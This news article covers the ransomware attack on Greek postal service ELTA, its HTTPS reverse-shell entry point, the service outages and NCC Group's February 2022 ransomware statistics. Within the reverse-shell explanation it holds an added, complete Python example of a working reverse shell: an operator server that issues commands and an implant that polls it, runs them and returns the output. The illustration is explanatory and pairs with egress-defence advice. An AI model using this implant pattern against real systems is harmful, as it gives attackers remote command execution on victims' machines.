Organization’s Data Center Isolated to Contain Targeted Ransomware Attack
The Greek postal service Hellenic Post – or ELTA – has disclosed information on a ransomware incident that forced the organization to pull a majority of its operations offline.
The company, in a statement on Monday, said that the suspension was temporary. But the impact appears to be ongoing, based on the organization’s Tuesday statement, which shows that it continues to work toward restoring services.
On Monday, ELTA disclosed that its information systems had been affected by a malware attack on Sunday. Its IT team had limited the attack, ELTA said, adding that an undisclosed cybersecurity vendor was investigating the incident and helping the organization restore services. ELTA said law enforcement authorities had been informed of the incident.
As an immediate precautionary measure, ELTA took its data center offline and isolated it, which resulted in a temporary suspension of all commercial information systems of all post offices throughout the country.
“For reasons of prevention and security, and until all the necessary actions are completed, it was decided to isolate the entire data center of the company. Therefore, we announce the temporary suspension of the commercial information system of all post offices,” ELTA said in its first statement.
On Tuesday, ELTA issued a fresh statement saying that the incident had not been a simple malware attack as initially thought, but a targeted ransomware attack “aimed at encrypting the critical systems” used in its daily operations.
A zero-day vulnerability, the statement said, had been exploited by the undisclosed threat actor(s) to penetrate ELTA's network and deploy malware. The initial infection started from a workstation and used an HTTPS reverse shell to connect back to the attacker's system, it said.
A reverse shell is a command shell whose network connection is initiated from the victim's machine outward to a system the attacker controls. Once a host is compromised, the attacker usually wants interactive shell access so that arbitrary commands can be run on it. The straightforward way to get that, a "bind" shell that listens on the victim for an inbound connection, is rarely viable: perimeter firewalls block unsolicited inbound connections to workstations. So the attacker instead has the compromised machine open an outbound connection to a listener under the attacker's control, which is why it is called a "reverse" shell. Wrapping that connection in HTTPS makes it look like ordinary web browsing: it goes to port 443, which almost every network allows outbound, and the commands and their output are encrypted in transit, so a firewall or proxy that does not intercept TLS sees only a client talking to a web server.
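To make the mechanism concrete, the following is an added illustration and not code from ELTA, its investigators, or the original article. It runs both sides of an HTTP-style reverse shell on the loopback interface: an "operator" web server hands out one command per poll, and the "implant" on the compromised host makes outbound requests, runs the command, and posts the output back. Plain HTTP on 127.0.0.1 stands in for HTTPS to a remote listener on port 443; the endpoint paths `/poll` and `/result` and the function names are assumptions chosen for this example. Nothing here evades anything; the point is to show that every packet is initiated by the victim, which is exactly why inbound firewall rules do not stop it.

```python
"""Minimal HTTP reverse-shell exchange, both sides, for illustration only.

Added example (not from the original article). Runs entirely on loopback:
the operator side is a tiny HTTP server, the implant side is a client that
polls it. In a real HTTPS reverse shell the same exchange runs under TLS to
port 443 on an attacker-controlled host, so it looks like web browsing.
"""
import http.server
import subprocess
import threading
import urllib.request


class OperatorHandler(http.server.BaseHTTPRequestHandler):
    """Operator ("attacker") side. Assumed paths: GET /poll, POST /result."""

    def do_GET(self):
        # Hand the implant the next queued command, or an empty body if none.
        queue = self.server.queue
        body = (queue.pop(0) if queue else "").encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        # Collect the command output the implant posts back.
        length = int(self.headers.get("Content-Length", 0))
        self.server.results.append(self.rfile.read(length).decode())
        self.send_response(204)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_operator(port=0):
    """Start the operator listener on loopback; port 0 picks a free port."""
    srv = http.server.HTTPServer(("127.0.0.1", port), OperatorHandler)
    srv.queue = []    # commands waiting to be issued
    srv.results = []  # outputs received from the implant
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def implant_poll_once(base_url):
    """Implant (victim) side: one outbound poll, run the command, post output.

    Returns the command's stdout, or None if the operator had nothing queued.
    Every connection here is outbound from the victim; nothing listens on it.
    """
    with urllib.request.urlopen(base_url + "/poll") as resp:
        cmd = resp.read().decode()
    if not cmd:
        return None
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    req = urllib.request.Request(
        base_url + "/result", data=proc.stdout.encode(), method="POST"
    )
    urllib.request.urlopen(req).close()
    return proc.stdout


if __name__ == "__main__":
    srv = start_operator()
    url = "http://127.0.0.1:%d" % srv.server_address[1]
    srv.queue.append("id")          # operator queues a command
    implant_poll_once(url)          # victim polls, runs it, posts the result
    print("operator received:", srv.results)
    srv.shutdown()
```

The defensive consequence is the one a practitioner should take from the ELTA description: blocking inbound traffic does nothing against this pattern, so controls have to sit on the egress path (a proxy that requires authentication and logs destinations, egress allow-listing for servers, and alerting on workstations that repeatedly contact a new external host) and on the endpoint, where a shell or script spawned by a process that also holds an outbound TLS connection is the thing to look for.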
Because the initial infection started from a workstation on ELTA's network, the company says it is examining more than 2,500 computer systems and installing fresh software on them as a security measure. It adds that "the goal is the immediate re-opening of the commercial information system, the security of all data and the faster normalization in the operation of the stores."
“The stores will not serve the collection of bills, the sending of mail and the financial services,” it says, adding that the distribution of mail and parcels that are already at the mail stations will be conducted without a hitch.
To ensure business continuity, the postal service provider has used ELTA Courier, a premium subsidiary of ELTA, to provide all but financial services. This unit was not affected by the cyberattack.
ELTA Courier confirmed this in a separate announcement. The courier unit's prices, however, are three times those of the regular postal service, since it offers premium, faster delivery than its parent organization, says Facebook user Gianna Kourla in response to ELTA's social media post. ELTA's web labeling service appears to have been hit as well, according to Kourla.
The Hellenic Data Protection Authority did not immediately respond to ISMG’s request for additional details.
February 2022: Increase in Ransomware
Ransomware attacks in February increased 53% month-on-month, cybersecurity consultancy firm NCC Group tells Information Security Media Group.
Industrial (35.68%), consumer cyclicals (21.62%) and technology (8.11%) were the most targeted sectors in the month, while North America (42.16%), Europe (42.16%) and Asia (10.27%) were the most targeted regions, the company’s report, shared with ISMG, shows.
LockBit 2.0, it says, remained the most active threat actor, accounting for 42.2% of all ransomware attacks, with Conti in second position (18%) and BlackCat (11%) in third. NCC predicts that BlackCat will remain among the top three aggressors in March as well.
Matt Hull, cyberthreat intelligence manager at the NCC Group, tells ISMG that with ransomware attacks increasing – as expected after the seasonal reduction in January – it is vital that organizations continue to ensure they apply appropriate security measures.
“This is especially important for the industrials sector, which continues to be the most frequent victim of ransomware,” he says. “It’s interesting to see a regional trend emerging in Europe and North America, with both regions seeing the same number of victims of double-extortion ransomware attacks. By continuing to closely monitor if this pattern persists, we will be able to determine what this means for the wider European threat landscape.”